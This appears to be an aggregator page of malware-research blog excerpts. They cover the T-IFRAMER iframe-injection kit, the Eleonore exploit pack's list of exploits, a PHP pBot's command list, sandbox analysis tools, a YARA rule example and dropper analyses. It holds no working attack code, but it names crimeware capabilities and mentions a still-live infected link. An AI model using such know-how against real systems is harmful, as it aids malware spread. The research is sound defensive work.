Skip navigation.


"Vosate Nofooz" - an almost unknown iranian malware [ part 1 ]

Well, after took some glance at this malware, I've been decided to write up something useful for this kind of almost unknown malware .
the term "unknown" is not referred to something dangerous with the high level risk !
actually this malware doesn't dangerous as people have thinking about it, this kind of malware is difficult on the cleaning phase .
the malware doesn't act as so dangerous code, but it's robust in the field of self-defense .

T-IFRAMER. Kit for the injection of malware In-the-Wild

| |

T-IFRAMER is a package that allows you to automate, centralize and manage via http the spread of malicious code via code injection sites violated viral techniques using iframe, and feed a botnet. We then see a screen capture of authentication.

While there is a complex kit allows computer criminals manage the spread of malware via the http protocol type attacks using Drive-by-Download and Drive-by-Injection by inserting iframe tags in web pages violated.

The four key modules: Stats, Manager, Iframes and Injector, and each has the main function to optimize the spread of malware.

The first one (Stats) to manage FTP accounts violated having control over them with the ability to upload files. Thus begins one of the cycles of propagation of malicious code.

Malware analyzer under Windows


Do you want to analyze malware and you are tired of complicated environments where you almost must be a computer engineer to get it working and the hardware requirements are too exigent for the computer you have? Then the solution is Buster Sandbox Analyzer.

Buster Sandbox Analyzer runs under Windows using Sandboxie ( as environment to run the malwares.

A default installation of Sandboxie, which takes less than 1 minute to install, will be enough to start working with Buster Sandbox Analyzer.

Ether Automation Utility: Ether Bunny

Ether Bunny is a script that I use to automatically startup and run Xen domains, copy files, and then execute them with Ether. It is a quick hack I put together. Most of the variables at the top of the file will need to be changed to match your configuration. This script is made available as-is. If it doesn't work you'll need to debug it on your own. That being said if you find it useful and modify it let me know and I'll be happy to update the public version.

You'll need to get a copy of Winexe as well to remotely run the files. There are some setup instructions at the Winexe page that will help you to configure your host machine.

Here's how I use it:

snoosnoo:/xen# ./ malware.exe
Ether Bunny v0.1 by Danny Quist

Analyzing malware.exe to on VM
Destroying old vm image /xen/winxp-sp2-malware-instance/
Restoring vm image...
Starting vm from /etc/xen/ramdisk-winxp-sp2.cfg
Copying malware.exe to VM 1166 at
Attempt: 1
Running malware.exe on VM winxp-sp2-ramdisk (1166)
Letting program run...
dos charset 'CP850' unavailable - using ASCII
EPOLL_CTL_ADD failed (Operation not permitted) - falling back to select()
Killing ether.
Destroying VM ID: 1166

Download Ether Bunny here.


Edit Jan 18 2011: The Winexe site seems to have disappeared, so I have linked to my local compiled copy.

ZeuS and power Botnet zombie recruitment

| |

As I have said on several occasions, ZeuS botnets is one of the more "media" (hence one of the best known and popular), more aggressive and criminal activity that has more advanced functions that allow phishing attacks, monitor the zombies in real time and collect all this information through different protocols.

[Crimeware] Researches and Reversing about Eleonore Exploit Pack


Today we will see how works Eleonore Exploit Pack directly from an infected website.

Essentially Eleonore Exploit Pack is a collection of Exploits and Data Statistics Collectors, this is the 'marketing' presentation of the exploit pack:

I present new actual russian exploits pack "Eleonore Exp v1.2"

Exploits on pack:
> MS009-02
> Telnet - Opera
> Font tags - FireFox
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> DirectX DirectShow
> Spreadsheet

PHP pBot Dissection

Today I'll dissect a website infected with PHP:Pbot-A according to Avast naming convenction.

Be careful link reported is still alive!

From a malicious domains DB emerged this infected URL

As you can see it seems a classical .txt file, but this is a classical evidence of RFI Infection.

MD5 : da67134fc6953201d3556f5fedbcd50d

* #crew@corp. since 2003
* edited by: devil__ and MEIAFASE
* Friend: LP
* .user //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot

YARA 1.3 released

I'm glad to announce a new version of YARA which includes three new major features, some of them inspired by requests and suggestions of some users out there. They are:

* C-style includes. Now you can include a YARA source file into another just like you do in your C programs with the #include pre-processor directive.

* Metadata in rules. Rules now can contain associated metadata in identifier/value pairs. Metadata information can be string, integer or boolean values. This metadata can be accessed later from the yara-python extension.

* Multi-source compilation in yara-python. A group of YARA source files can be compiled together in yara-python. In this way rules from different sources can be matched at the same time against your data, which is more efficient than compiling and matching each source independently.

Here is an example of the "include" and "metadata" features:

include "./includes/some_other_rules.yar"

rule silent_banker : banker
        description = "This is just an example"
        thread_level = 3
        in_the_wild = true

        $a = {6A 40 68 00 30 00 00 6A 14 8D 91}  
        $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
        $a or $b or $c

For more info:

Swimming into Trojan and Rootkit GameThief Win32 Magania Hostile Code


Here my last paper.


Trojan-GameThief.Win32.Magania, according to Kaspersky naming convention, monitors the user activities trying to obtain valuable information from the affected user, especially about gaming login accounts. This long tutorial analyze this malware but is also a general document which explains how to analyze a modern nested-dolls malware.

Giuseppe 'Evilcry' Bonfa'

W32/Rustock.F, a quite unknown Rustock.C dropper

Some days ago a friend of mine posted me a suspicious malware, unfortunately I couldn’t look at it before yesterday night because I was out for work.

By submitting the file to I could see that only the 39,02% of the av recognizes it as a malware (some popular antivirus like Kaspersky or Symantec, for example, don’t recognize it), Microsoft calls it “TrojanDropper:Win32/Rustock.F” while for Panda it is “Trj/Rustock.L”.

As resulting from the analysis this is really a dropper for the famous malware Rustock.C.

A lot of papers has been written on Rustock.C so I will analyze only this dropper in order to make you know that this is a malware even if your antivirus does not signal it as a bad application.

The file I’m talking about is called “is7771.exe”.

In the article I will explain the behaviour of the dropper in details, take a look at it here:

Syndicate content